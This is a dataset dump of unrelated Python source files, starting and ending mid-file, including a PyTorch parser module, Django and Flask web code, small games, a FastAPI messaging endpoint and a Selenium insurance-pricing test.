2, dtype=torch.long, device='cuda')\n valence_array[:, 1] = 1\n valence_array = valence_array.view(-1)\n\n mask = mask.unsqueeze(-1).expand(-1, -1, 8).reshape(-1)\n return expanded, direction_array, valence_array, mask\n\n def prepare_trainsition(self, arrays_to_expand, mask, batch_size, max_len, only_mask=False):\n if only_mask is False:\n expanded = []\n for array in arrays_to_expand:\n array = array.view(batch_size, -1, 1, array.shape[-1])\n array = array.expand(-1, max_len, 2 * self.cv, -1)\n array = array.reshape(batch_size * max_len * 2 * self.cv, -1)\n expanded.append(array)\n\n direction_array = torch.zeros(\n batch_size * max_len, 2, self.cv, dtype=torch.long, device='cuda')\n direction_array[:, 1, :] = 1\n direction_array = direction_array.view(-1)\n\n if self.cv == 2:\n valence_array = torch.zeros(\n batch_size * max_len * 2, self.cv, dtype=torch.long, device='cuda')\n valence_array[:, 1] = 1\n valence_array = valence_array.view(-1)\n else:\n valence_array = torch.zeros(\n batch_size * max_len * 2, dtype=torch.long, device='cuda')\n else:\n expanded, direction_array, valence_array = None, None, None\n\n mask = (mask.unsqueeze(2) & mask.unsqueeze(1)).unsqueeze(\n 3).expand(-1, -1, -1, 2 * self.cv).reshape(-1)\n return expanded, direction_array, valence_array, mask\n\n def transition_param_helper(self, group_ids, forward_output, valid_direction=False):\n \"\"\"convert (batch, seq_len, 2, self.cv, num_tag) to (batch, seq_len, seq_len, [direction,] self.cv)\"\"\"\n batch_size, max_len = group_ids.shape\n forward_output = forward_output.view(\n batch_size, max_len, 2, self.cv, self.o.num_tag)\n index = group_ids.view(batch_size, 1, 1, 1,\n max_len).expand(-1, max_len, 2, self.cv, -1)\n h = torch.gather(forward_output, 4, index).permute(\n 0, 1, 4, 2, 3).contiguous()\n if valid_direction:\n index = torch.ones(batch_size, max_len, max_len,\n 1, self.cv, dtype=torch.long, device='cuda')\n for i in range(max_len):\n index[:, i, :i] = 0\n h = torch.gather(h, 3, index).squeeze(3)\n return h\n\n def set_lex(self, word_idx, pos_idx):\n # assert w`ord_idx.shape == pos_idx.shape\n self.word_idx = word_idx\n # self.pos_idx = torch.cat(\n # [torch.arange(self.num_pos, device=pos_idx.device), pos_idx])\n if self.o.use_emb_as_w:\n if self.o.use_word_emb and self.o.freeze_word_emb:\n self.prefetched_word_emb = self.word_encoder.emb(word_idx)\n # if self.o.use_pos_emb:\n # self.child_pos_emb = nn.Embedding(\n # self.num_pos, self.pos_dim) if self.o.use_child_pos_emb else self.pos_encoder.emb\n\n def reduce_lr_rate(self):\n print('lr reduced')\n self.lr *= self.lr_decay\n for param_group in self.optimizer.param_groups:\n param_group['lr'] *= self.lr_decay\n\n def reset_lr_rate(self):\n self.lr = self.o.lr\n for param_group in self.optimizer.param_groups:\n param_group['lr'] *= self.lr\n\n def save(self, path):\n torch.save({'model_state_dict': self.state_dict()},\n os.path.join(path, 'model'))\n\n def load(self, path):\n self.load_state_dict(torch.load(os.path.join(path, 'model'))[\n 'model_state_dict'])\n\n def reset(self):\n if self.o.use_word_emb:\n self.word_encoder.reset()\n if self.o.use_pos_emb:\n self.pos_encoder.reset()\n if self.o.use_lan_emb:\n self.lan_emb.reset_parameters()\n if self.o.use_valence_emb:\n self.cv_emb.reset_parameters()\n if self.dv_emb is not self.cv_emb:\n self.dv_emb.reset_parameters()\n if self.use_direction_emb:\n self.direction_emb.reset_parameters()\n self.emb_linear.reset_parameters()\n else:\n self.left_right_linear.reset_parameters()\n\n self.decision_linear.reset_parameters()\n self.decision_out_linear.reset_parameters()\n\n self.child_linear.reset_parameters()\n if self.o.use_emb_as_w:\n # if self.o.use_pos_emb and self.o.use_child_pos_emb is True:\n # self.child_pos_emb.reset_parameters()\n nn.init.normal_(self.pos_emb_out.data)\n else:\n self.child_out_linear.reset_parameters()\n\n self.lr = self.o.lr\n self.optimizer = torch.optim.Adam(self.parameters(), lr=self.o.lr)\n\n def __call__(self, *args, **kwargs) -> typing.Any:\n return super().__call__(*args, **kwargs)\n","sub_path":"module/neural_m.py","file_name":"neural_m.py","file_ext":"py","file_size_in_byte":19265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"316569834","text":"# coding: utf-8\n#\n# Copyright 2013 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS-IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n__author__ = 'Sean Lip'\n\nfrom oppia.apps.exploration.domain import Exploration\nimport oppia.apps.exploration.services as exp_services\nfrom oppia.apps.state.models import State\nfrom oppia.apps.widget.models import InteractiveWidget\n\nfrom django.utils import unittest\n\n\nclass FakeExploration(Exploration):\n \"\"\"Allows dummy explorations to be created and commited.\"\"\"\n\n def __init__(self, exp_id='fake_exploration_id', owner_id=None):\n \"\"\"Creates a dummy exploration.\"\"\"\n self.id = exp_id\n self.title = 'title'\n self.category = 'category'\n self.state_ids = []\n self.parameters = []\n self.is_public = False\n self.image_id = 'image_id'\n self.editor_ids = [owner_id] if owner_id else []\n\n def put(self):\n \"\"\"The put() method is patched to make no commits to the datastore.\"\"\"\n self._pre_put_hook()\n\n\nclass ExplorationDomainUnitTests(unittest.TestCase):\n \"\"\"Test the exploration domain object.\"\"\"\n\n def setUp(self):\n \"\"\"Loads the default widgets.\"\"\"\n super(ExplorationDomainUnitTests, self).setUp()\n InteractiveWidget.load_default_widgets()\n\n def tearDown(self):\n \"\"\"Deletes all widgets and explorations.\"\"\"\n InteractiveWidget.delete_all_widgets()\n explorations = exp_services.get_all_explorations()\n for exploration in explorations:\n exploration.delete()\n super(ExplorationDomainUnitTests, self).tearDown()\n\n def test_validation(self):\n \"\"\"Test validation of explorations.\"\"\"\n exploration = FakeExploration()\n\n # The 'state_ids property must be a non-empty list of strings\n # representing State ids.\n with self.assertRaises(Exploration.ObjectValidationError):\n exploration.state_ids = ['A string']\n exploration.put()\n\n # There must be at least one editor id.\n with self.assertRaises(Exploration.ObjectValidationError):\n exploration.put()\n\n def test_init_state_property(self):\n \"\"\"Test the init_state property.\"\"\"\n INIT_STATE_ID = 'init_state_id'\n INIT_STATE_NAME = 'init_state_name'\n\n init_state = State(id=INIT_STATE_ID, name=INIT_STATE_NAME)\n init_state.put()\n\n exploration = FakeExploration(owner_id='owner@example.com')\n exploration.state_ids = ['init_state_id']\n self.assertEqual(exploration.init_state_id, INIT_STATE_ID)\n self.assertEqual(exploration.init_state.name, INIT_STATE_NAME)\n\n exploration.add_state('b')\n self.assertEqual(exploration.init_state_id, INIT_STATE_ID)\n self.assertEqual(exploration.init_state.name, INIT_STATE_NAME)\n\n def test_is_demo_property(self):\n \"\"\"Test the is_demo property.\"\"\"\n demo = FakeExploration(exp_id='0')\n self.assertEqual(demo.is_demo, True)\n\n notdemo1 = FakeExploration(exp_id='a')\n self.assertEqual(notdemo1.is_demo, False)\n\n notdemo2 = FakeExploration(exp_id='abcd')\n self.assertEqual(notdemo2.is_demo, False)\n\n def test_is_owned_by(self):\n \"\"\"Test the is_owned_by() method.\"\"\"\n owner_id = 'owner@example.com'\n editor_id = 'editor@example.com'\n viewer_id = 'viewer@example.com'\n\n exploration = FakeExploration(owner_id=owner_id)\n exploration.add_editor(editor_id)\n\n self.assertTrue(exploration.is_owned_by(owner_id))\n self.assertFalse(exploration.is_owned_by(editor_id))\n self.assertFalse(exploration.is_owned_by(viewer_id))\n self.assertFalse(exploration.is_owned_by(None))\n\n def test_is_editable_by(self):\n \"\"\"Test the is_editable_by() method.\"\"\"\n owner_id = 'owner@example.com'\n editor_id = 'editor@example.com'\n viewer_id = 'viewer@example.com'\n\n exploration = FakeExploration(owner_id=owner_id)\n exploration.add_editor(editor_id)\n\n self.assertTrue(exploration.is_editable_by(owner_id))\n self.assertTrue(exploration.is_editable_by(editor_id))\n self.assertFalse(exploration.is_editable_by(viewer_id))\n self.assertFalse(exploration.is_editable_by(None))\n\n def test_state_operations(self):\n \"\"\"Test adding, renaming and checking existence of states.\"\"\"\n exploration = FakeExploration(owner_id='owner@example.com')\n exploration.add_state('Initial state')\n\n self.assertEqual(len(exploration.state_ids), 1)\n\n default_state = State.get(exploration.state_ids[0])\n default_state_name = default_state.name\n exploration.rename_state(default_state.id, 'Renamed state')\n\n # Update default_state after rename\n default_state = State.get(exploration.state_ids[0])\n\n self.assertEqual(len(exploration.state_ids), 1)\n self.assertEqual(default_state.name, 'Renamed state')\n\n # Add a new state.\n second_state = exploration.add_state('State 2')\n self.assertEqual(len(exploration.state_ids), 2)\n\n # It is OK to rename a state to itself.\n exploration.rename_state(second_state.id, second_state.name)\n self.assertEqual(second_state.name, 'State 2')\n\n # But it is not OK to add or rename a state using a name that already\n # exists.\n with self.assertRaises(Exception):\n exploration.add_state('State 2')\n with self.assertRaises(Exception):\n exploration.rename_state(second_state.id, 'Renamed state')\n\n # The exploration now has exactly two states.\n self.assertFalse(exploration._has_state_named(default_state_name))\n self.assertTrue(exploration._has_state_named('Renamed state'))\n self.assertTrue(exploration._has_state_named('State 2'))\n\n def test_delete_state(self):\n \"\"\"Test deletion of states.\"\"\"\n exploration = FakeExploration(owner_id='owner@example.com')\n exploration.add_state('first_state')\n\n with self.assertRaises(Exception):\n exploration.delete_state(exploration.state_ids[0])\n\n exploration.add_state('second_state')\n exploration.delete_state(exploration.state_ids[1])\n\n with self.assertRaises(Exception):\n exploration.delete_state('fake_state')\n","sub_path":"oppia/apps/exploration/domain_test.py","file_name":"domain_test.py","file_ext":"py","file_size_in_byte":6798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"493651277","text":"# -*- coding: utf-8 -*-\nfrom rest_framework import serializers\n\nfrom .models import Supplier, RepresentationOrder, Defendant\n\n\nclass SupplierSerializer(serializers.ModelSerializer):\n class Meta:\n model = Supplier\n fields = (\n 'code', 'parent', 'name', 'suty_supplier_type', 'vat_reg',\n 'address', 'country'\n )\n\n\nclass DefendantSerializer(serializers.ModelSerializer):\n class Meta:\n model = Defendant\n fields = (\n 'code', 'first_name', 'other_name', 'last_name', 'date_of_birth'\n )\n\n\nclass RepresentationOrderSerializer(serializers.ModelSerializer):\n defendant = DefendantSerializer(read_only=True)\n\n class Meta:\n model = RepresentationOrder\n fields = (\n 'code', 'defendant', 'supplier', 'date'\n )\n","sub_path":"supplier_api/apps/suppliers/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"297523773","text":"import time\n\nclass GridsProcessing:\n def __init__(self):\n self.directions = [(-1, -1), (0, -1), (1, -1), (-1, 0), (1, 0), (-1, 1), (0, 1), (1, 1)]\n\n # 取得比分\n def getScore(self, occupiedGrids:dict):\n score = [0, 0]\n for status in occupiedGrids.values():\n if status is True:\n score[0] += 1\n else:\n score[1] += 1\n return score\n\n # 吃子 (Return has captures or not)\n def capture(self, occupiedGrids:dict, pos:tuple, nextColor:bool):\n if pos in occupiedGrids.keys():\n return False\n ct = 0\n for d in self.directions:\n # 找出d方向可以造成包夾的棋子\n now = [pos[0] + d[0], pos[1]+ d[1]]\n while now[0] >= 0 and now[0] <= 7 and now[1] >= 0 and now[1] <= 7:\n if (now[0], now[1]) not in occupiedGrids: # 是空的\n break\n if occupiedGrids[(now[0], now[1])] == nextColor: # 找到了\n # 取得d方向可以吃掉的棋子\n now[0] -= d[0]\n now[1] -= d[1]\n while now[0] != pos[0] or now[1] != pos[1]:\n ct += 1\n occupiedGrids[(now[0], now[1])] = nextColor\n now[0] -= d[0]\n now[1] -= d[1]\n now[0] = -9 # break\n now[0] += d[0]\n now[1] += d[1]\n if ct == 0: return False\n occupiedGrids[pos] = nextColor\n return True\n\n # 取得提示(Return list of pos)\n def getHints(self, occupiedGrids:dict, nextColor:bool):\n hints = list()\n for pos, status in occupiedGrids.items():\n if status is nextColor:\n continue\n for d in self.directions:\n # 確定d的反方向一格是空的、沒有在hints裡、沒有超出邊界\n r = (pos[0] - d[0], pos[1] - d[1])\n if r in occupiedGrids or r in hints or r[0] == -1 or r[0] == 8 or r[1] == -1 or r[1] == 8:\n continue\n # 找出d方向可以造成包夾的棋子\n times = 0\n now = [pos[0], pos[1]]\n while now[0] >= 0 and now[0] <= 7 and now[1] >= 0 and now[1] <= 7:\n if (now[0], now[1]) not in occupiedGrids: # 是空的\n break\n if occupiedGrids[(now[0], now[1])] == nextColor: # 找到了\n if times >= 1:\n hints.append(r)\n break\n now[0] += d[0]\n now[1] += d[1]\n times += 1\n return hints\n\n # 取得提示(未確定能否吃子)\n def getNoCheckedHints(self, occupiedGrids:dict, nextColor:bool):\n hints = list()\n for pos, status in occupiedGrids.items():\n if status is nextColor:\n continue\n # 取得所有周邊位置\n for d in self.directions:\n a = (pos[0] + d[0], pos[1] + d[1])\n # 沒有在 occupiedGrids 和 hints 裡、沒有超出邊界\n if a in occupiedGrids or a in hints or a[0] == -1 or a[0] == 8 or a[1] == -1 or a[1] == 8:\n continue\n hints.append(a)\n return hints\n","sub_path":"Reversi/Grid.py","file_name":"Grid.py","file_ext":"py","file_size_in_byte":3395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"573160284","text":"from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask import render_template, flash, redirect, url_for\nfrom forms import LoginForm\nfrom config import Config\n\n\napp = Flask(__name__)\napp.config.from_object(Config)\n\n\n@app.route(\"/\")\n@app.route(\"/index\", methods=[\"GET\", \"POST\"])\ndef index():\n user = {'username': 'Kenny'}\n posts = [\n {\n 'author': {'username': 'John'},\n 'body': 'Beautiful day in Portland!'\n },\n {\n 'author': {'username': 'Susan'},\n 'body': 'The Avengers movie was so cool!'\n }\n ]\n return render_template('index.html', title='Home', user=user, posts=posts)\n\n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n form = LoginForm()\n if form.validate_on_submit():\n flash(\"Login requested for user {}, remember_me{}\".format(\n form.username.data, form.remember_me.data))\n return redirect(url_for('index'))\n return render_template('login.html', title=\"Sing In\", form=form)\n\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"426061686","text":"import tensorflow as tf\nimport os\nimport matplotlib.pyplot as plt\n\n\n# num_skipped = 0\n# for folder_name in (\"Cat\", \"Dog\"):\n# print(folder_name)\n# folder_path = os.path.join(\"PetImages\", folder_name)\n# print(folder_path)\n# for fname in os.listdir(folder_path):\n# print(fname)\n# fpath = os.path.join(folder_path, fname)\n# print(fpath)\n# try:\n# fobj = open(fpath, \"rb\")\n# is_jfif = tf.compat.as_bytes(\"JFIF\") in fobj.peek(10)\n# finally:\n# fobj.close()\n#\n# if not is_jfif:\n# num_skipped += 1\n# os.remove(fpath)\n#\n# print(\"Deleted %d images\" % num_skipped)\n\nimage_size = (180, 180)\nbatch_size = 32\n\ntrain_ds = tf.keras.preprocessing.image_dataset_from_directory(\n \"PetImages\", validation_split=0.2, subset=\"training\", seed=1337, image_size=image_size, batch_size=batch_size,\n)\n\nval_ds = tf.keras.preprocessing.image_dataset_from_directory(\n \"PetImages\", validation_split=0.2, subset=\"validation\", seed=1337, image_size=image_size, batch_size=batch_size,\n)\n\nfor item in train_ds:\n print(item)\n\nplt.figure(figsize=(10, 10))\nfor images, labels in train_ds.take(1):\n for i in range(9):\n ax = plt.subplot(3, 3, i + 1)\n plt.imshow(images[i].numpy().astype(\"uint8\"))\n plt.title(int(labels[i]))\n plt.axis(\"off\")\n\n\n\n","sub_path":"tf/Image-classification-from-scratch.py","file_name":"Image-classification-from-scratch.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"647460777","text":"from django.test import TestCase, Client\nfrom django.urls import reverse\n\n\nclass TestLandingRender(TestCase):\n\n def setUp(self):\n self.client = Client()\n\n def test_landing_page(self):\n url = reverse('landing')\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'landing.html')","sub_path":"tests/chartwebsite/test_landing.py","file_name":"test_landing.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"280859613","text":"import turtle\nt1 = turtle.Turtle()\nturtle.bgcolor(\"black\")\nt1.pencolor('white')\nscr = turtle.Screen()\njogada = 0\ndef newgame(x, y):\n global mapax\n mapax = x\n global mapay\n mapay = y\n global matrix\n matrix = []\n for i in range (3):\n matrix.append([-1, -1, -1])\n t1.clear()\n t1.setheading(0)\n t1.penup()\n t1.goto([x, y])\n t1.pendown()\n t1.forward(300)\n t1.penup()\n t1.left(90)\n t1.forward(100)\n t1.left(90)\n t1.pendown()\n t1.forward(300)\n t1.penup()\n t1.left(90)\n t1.forward(200)\n t1.left(90)\n t1.forward(100)\n t1.left(90)\n t1.pendown()\n t1.forward(300)\n t1.right(90)\n t1.penup()\n t1.forward(100)\n t1.pendown()\n t1.right(90)\n t1.forward(300)\n scr.onclick(checarposicao)\nscr.onclick(newgame)\nt1.speed(-1)\ndef checarvitoria():\n for r in range (3):\n soma = 0\n for c in range (3):\n if -1 in matrix[r]:\n soma = -1\n break\n else:\n soma += matrix [r][c]\n if soma == 3:\n print(\"genial!\")\n scr.onclick(newgame)\n\n elif soma == 0:\n print(\"ilustre!\")\n scr.onclick(newgame)\n\n #checar colunas\n for c in range (3):\n rick = 0\n for line in range (3):\n if matrix[0][c] == -1 or matrix[1][c] == -1 or matrix[2][c] == -1:\n rick = -1\n break\n else:\n rick += matrix [line][c]\n if rick == 3:\n print(\"genial!\")\n scr.onclick(newgame)\n\n elif rick == 0:\n print(\"ilustre!\")\n scr.onclick(newgame)\n\n \n #checar diagonais\n morty = 0\n for i in range (3):\n if matrix[i][i] == -1:\n morty = -1\n break\n else:\n morty += matrix[i][i]\n if morty == 3:\n print(\"genial!\")\n scr.onclick(newgame)\n elif morty == 0:\n print(\"ilustre!\")\n scr.onclick(newgame)\n\n if matrix[2][0] != -1 and matrix[1][1] != -1 and matrix[0][2] != -1:\n Goldenfold = matrix[2][0] + matrix[1][1] + matrix[0][2]\n if Goldenfold == 3.0:\n print(\"genial!\")\n scr.onclick(newgame)\n elif Goldenfold == 0.0:\n print(\"ilustre!\")\n scr.onclick(newgame)\n\n else:\n print(\"ah não vei\")\n scr.onclick(newgame)\ndef checarposicao(x, y):\n if x <= mapax + 100 and y <= mapay and matrix[2][0] == -1:\n draw(mapax + 50, mapay - 50)\n matrix[2][0] = jogada % 2\n\n if x <= mapax + 200 and y <= mapay and x >= mapax + 100 and matrix[2][1] == -1:\n draw(mapax + 150, mapay - 50)\n matrix[2][1] = jogada % 2\n if x <= mapax + 300 and y <= mapay and x >= mapax + 200 and matrix[2][2] == -1:\n draw(mapax + 250, mapay - 50)\n matrix[2][2] = jogada % 2\n if x <= mapax + 100 and y <= mapay + 100 and y >= mapay + 50 and matrix[1][0] == -1:\n draw(mapax + 50, mapay + 50)\n matrix[1][0] = jogada % 2\n if x <= mapax + 200 and y >= mapay and x >= mapax + 100 and y <= mapay + 100 and matrix[1][1] == -1:\n draw(mapax + 150, mapay + 50)\n matrix[1][1] = jogada % 2\n if y >= mapay and x >= mapax + 200 and y <= mapay + 100 and matrix[1][2] == -1:\n draw(mapax + 250, mapay + 50)\n matrix[1][2] = jogada % 2\n if x <= mapax + 100 and y >= mapay + 100 and matrix[0][0] == -1:\n draw(mapax + 50, mapay + 150)\n matrix[0][0] = jogada % 2\n if x>= mapax + 100 and y >= mapay + 100 and x <= mapax + 200 and matrix[0][1] == -1:\n draw(mapax + 150, mapay + 150)\n matrix[0][1] = jogada % 2\n if y >= mapay + 100 and x >= mapax + 200 and matrix[0][2] == -1:\n draw(mapax + 250, mapay + 150)\n matrix[0][2] = jogada % 2\n checarvitoria()\ndef draw(x, y):\n global jogada\n jogada += 1\n if jogada % 2 == 0:\n t1.penup()\n t1.goto(x, y)\n t1.pendown()\n t1.circle(15) \n else:\n t1.penup()\n t1.goto(x + 45, y + 45)\n t1.setheading(220)\n t1.pendown()\n t1.forward(135)\n t1.penup()\n t1.goto(x + 45, y - 45)\n t1.setheading(135)\n t1.pendown()\n t1.forward(135)\n\n\n\ninput()","sub_path":"JOGO DA VELHA.py","file_name":"JOGO DA VELHA.py","file_ext":"py","file_size_in_byte":4255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"106335150","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Jul 15 11:07:50 2018\r\n\"\"\"\r\nimport random as rnd\r\n\r\nclass Character():\r\n STR = 3\r\n DEX = 3\r\n INT = 3\r\n HP = 8\r\n special_active = False\r\n \r\n def shuffle(self, missing_cards):\r\n for key in self.cards:\r\n for i in range(self.cards.get(key)[1]):\r\n self.deck.append(key)\r\n for card in missing_cards:\r\n self.deck.remove(card)\r\n rnd.shuffle(self.deck)\r\n return self.deck\r\n\r\n def fight(self, target):\r\n while self.HP > 0 and target.HP > 0:\r\n self.resolve_cards_between(target, self.draw(), target.draw())\r\n if self.HP < 1:\r\n winner = target.name\r\n elif target.HP < 1:\r\n winner = self.name\r\n self.shuffle([])\r\n target.shuffle([])\r\n return winner\r\n \r\n def resolve_cards_between(self, target, owncard, oppcard):\r\n owncard = self.cards.get(owncard)\r\n oppcard = target.cards.get(oppcard)\r\n # determine initiative\r\n first = self.name\r\n if target.DEX > self.DEX:\r\n first = target.name\r\n if owncard[0] == \"Scoundrel's Pledge\" and oppcard[3] != owncard[2]:\r\n first = self.name\r\n elif oppcard[0] == \"Scoundrel's Pledge\" and owncard[3] != oppcard[2]:\r\n first = target.name\r\n # resolve cards\r\n if first == self.name:\r\n self.resolve_card(target, owncard, oppcard)\r\n if target.HP > 0:\r\n target.resolve_card(self, oppcard, owncard)\r\n else:\r\n target.resolve_card(self, oppcard, owncard)\r\n if self.HP > 0:\r\n self.resolve_card(target, owncard, oppcard)\r\n\r\n def resolve_card(self, target, owncard, oppcard):\r\n for card_type in [owncard[2], oppcard[2]]:\r\n if card_type == 2:\r\n if self.name == 'Vampire' and self.special_active:\r\n self.HP += 2\r\n if target.name == 'Vampire' and target.special_active:\r\n target.HP += 2\r\n if oppcard[3] == owncard[2] and owncard[0] != 'Pummel':\r\n if owncard[1] == 1 and self.HP < 4:\r\n print(owncard[0]+' got countered by '+oppcard[0]+'. '+self.name+' needed that heal!')\r\n else:\r\n target.HP -= owncard[4]\r\n self.HP += owncard[5]\r\n if owncard[0] in ['Ancestral Tribute', 'Brotherhood of the Wolf']:\r\n self.adjust_attr(0, 1, 0)\r\n elif owncard[0] == 'River Of Blood':\r\n self.special_active = True\r\n \r\n def draw(self):\r\n if len(self.deck) == 0:\r\n self.shuffle([])\r\n drawn_card = self.deck[0]\r\n self.deck.remove(drawn_card)\r\n return drawn_card\r\n \r\n def adjust_attr(self, strength = 0, dexterity = 0, intelligence = 0):\r\n self.STR += strength\r\n self.DEX += dexterity\r\n self.INT += intelligence\r\n self.adjust_card_values()\r\n \r\n def reset_attr(self):\r\n self.STR = 3\r\n self.DEX = 3\r\n self.INT = 3\r\n self.adjust_card_values()","sub_path":"charClass.py","file_name":"charClass.py","file_ext":"py","file_size_in_byte":3139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"157965559","text":"import time\n\nfrom fastapi import APIRouter, Header, Request, Response\nfrom loguru import logger\n\nimport src.core.actions as actions\nimport src.db.crud as crud\nimport src.db.tasks as tasks\nfrom src.schemas import NewMessageBody\n\nrouter = APIRouter()\n\n\n@router.post(\"/new_message\")\nasync def new_message(\n response: Response,\n request: Request,\n messageinfo: NewMessageBody,\n Auth: str = Header(None),\n):\n logger.info(\n f\"POST request to endpoint /new_message from client {request.client.host}\"\n )\n if Auth is None:\n response.status_code = 403\n return {\"error\": \"No token supplied. Please submit a token.\"}\n tokenhash = actions.gentokenhash(Auth)\n\n async with tasks.Database() as conn:\n userdata = await conn.fetchrow(\n f\"SELECT * FROM USERS WHERE TOKEN='{tokenhash}';\"\n )\n\n if userdata is None:\n response.status_code = 403\n return {\n \"error\": \"Token supplied is invalid. \\\n Please correct your token or get one by sending a post request to /token .\"\n }\n messageid = str(actions.gensnowflake())\n\n await crud.new_message(\n conn,\n messageid,\n time.time_ns(),\n userdata[0],\n messageinfo.server_id,\n messageinfo.message_content,\n )\n\n return {\"message_id\": messageid}\n\n\n@router.get(\"/get_messages\")\nasync def get_messages(\n response: Response,\n request: Request,\n server_id: str = None,\n Auth: str = Header(None),\n):\n logger.info(\n f\"GET request to endpoint /get_messages from client {request.client.host}\"\n )\n if Auth is None:\n return {\"error\": \"No token supplied. Please submit a token.\"}\n\n async with tasks.Database() as conn:\n tokenhash = actions.gentokenhash(Auth)\n userdata = await conn.fetchrow(f\"SELECT * FROM USERS WHERE TOKEN='{tokenhash}'\")\n if userdata is None:\n return {\n \"error\": \"Token supplied is invalid. \\\n Please correct your token or get one by sending a post request to /tokens .\"\n }\n\n messages = await crud.get_messages(conn, server_id)\n messagelist = []\n\n for element in messages:\n message = {}\n message[\"id\"] = element[0]\n message[\"timestamp\"] = element[1]\n message[\"sender\"] = element[2]\n sender_name = await conn.fetchrow(\n f\"SELECT USERNAME FROM USERS WHERE ID='{element[2]}'\"\n )\n message[\"sender_name\"] = sender_name[\"username\"]\n message[\"content\"] = element[4]\n messagelist.append(message)\n\n return messagelist\n","sub_path":"backend/src/endpoints/messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":2719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"111130640","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom nose_parameterized import parameterized\n\nfrom vazhno import cell2bool, cell2date, cell2int, customize_method_name, load_data\nfrom vazhno.b2c import BaseB2CTest\nfrom vazhno.b2c.products.house.house_plus.pages import HousePlusInsurancePage\n\n\ndef load(workbook, test_name):\n sheet = workbook.sheet_by_index(0)\n\n data = []\n if sheet.nrows > 1:\n for row in range(sheet.nrows)[1:]:\n data.append((\n row + 1,\n test_name,\n {\n 'redmine': sheet.cell_value(row, 0),\n 'period': sheet.cell_value(row, 1),\n 'start_insurance': cell2date(sheet.cell_value(row, 2)),\n 'stop_insurance': cell2date(sheet.cell_value(row, 3)),\n 'cost': cell2int(sheet.cell_value(row, 4)),\n 'house_type': sheet.cell_value(row, 5),\n 'base_package': cell2bool(sheet.cell_value(row, 6)),\n 'act_of_terrorism': cell2bool(sheet.cell_value(row, 7)),\n 'movable_property': cell2bool(sheet.cell_value(row, 8)),\n 'movable_property_cost': cell2int(sheet.cell_value(row, 9)),\n 'movable_property_base_package': cell2bool(sheet.cell_value(row, 10)),\n 'movable_property_act_of_terrorism': cell2bool(sheet.cell_value(row, 11)),\n 'installations': cell2bool(sheet.cell_value(row, 12)),\n 'installations_cost': cell2int(sheet.cell_value(row, 13)),\n 'installations_base_package': cell2bool(sheet.cell_value(row, 14)),\n 'installations_act_of_terrorism': cell2bool(sheet.cell_value(row, 15)),\n 'bath': cell2bool(sheet.cell_value(row, 16)),\n 'bath_cost': cell2int(sheet.cell_value(row, 17)),\n 'bath_base_package': cell2bool(sheet.cell_value(row, 18)),\n 'bath_act_of_terrorism': cell2bool(sheet.cell_value(row, 19)),\n 'landscape_structure': cell2bool(sheet.cell_value(row, 20)),\n 'landscape_structure_cost': cell2int(sheet.cell_value(row, 21)),\n 'landscape_structure_base_package': cell2bool(sheet.cell_value(row, 22)),\n 'go': cell2bool(sheet.cell_value(row, 23)),\n 'go_cost': cell2int(sheet.cell_value(row, 24)),\n 'go_common': cell2bool(sheet.cell_value(row, 25)),\n 'loss_of_rent': cell2bool(sheet.cell_value(row, 26)),\n 'loss_of_rent_cost': cell2int(sheet.cell_value(row, 27)),\n 'loss_of_rent_wood_house': cell2bool(sheet.cell_value(row, 28)),\n 'loss_of_rent_stone_house': cell2bool(sheet.cell_value(row, 29)),\n 'expected': sheet.cell_value(row, 32)\n },\n ))\n\n return data\n\n\nclass TestPricing(BaseB2CTest):\n def setUp(self):\n try:\n super().setUp()\n self.home_page.house.click()\n self.home_page.house_plus.click()\n except Exception as e:\n self.tearDown()\n raise e\n\n def _test(self, params):\n if len(params['redmine']) > 0:\n self.need_screenshot = False\n self.skipTest(params['redmine'])\n\n page = HousePlusInsurancePage(self.driver)\n\n page.cost = params['cost']\n page.period = params['period']\n page.start_insurance = params['start_insurance']\n page.stop_insurance = params['stop_insurance']\n\n # Основное строение\n page.house_type = params['house_type']\n page.base_package = params['base_package']\n page.act_of_terrorism = params['act_of_terrorism']\n\n # Объекты страхования\n page.movable_property = params['movable_property']\n if params['movable_property']:\n page.movable_property_cost = params['movable_property_cost']\n page.movable_property_base_package = params['movable_property_base_package']\n page.movable_property_act_of_terrorism = params['movable_property_act_of_terrorism']\n page.installations = params['installations']\n if params['installations']:\n page.installations_cost = params['installations_cost']\n page.installations_base_package = params['installations_base_package']\n page.installations_act_of_terrorism = params['installations_act_of_terrorism']\n page.bath = params['bath']\n if params['bath']:\n page.bath_cost = params['bath_cost']\n page.bath_base_package = params['bath_base_package']\n page.bath_act_of_terrorism = 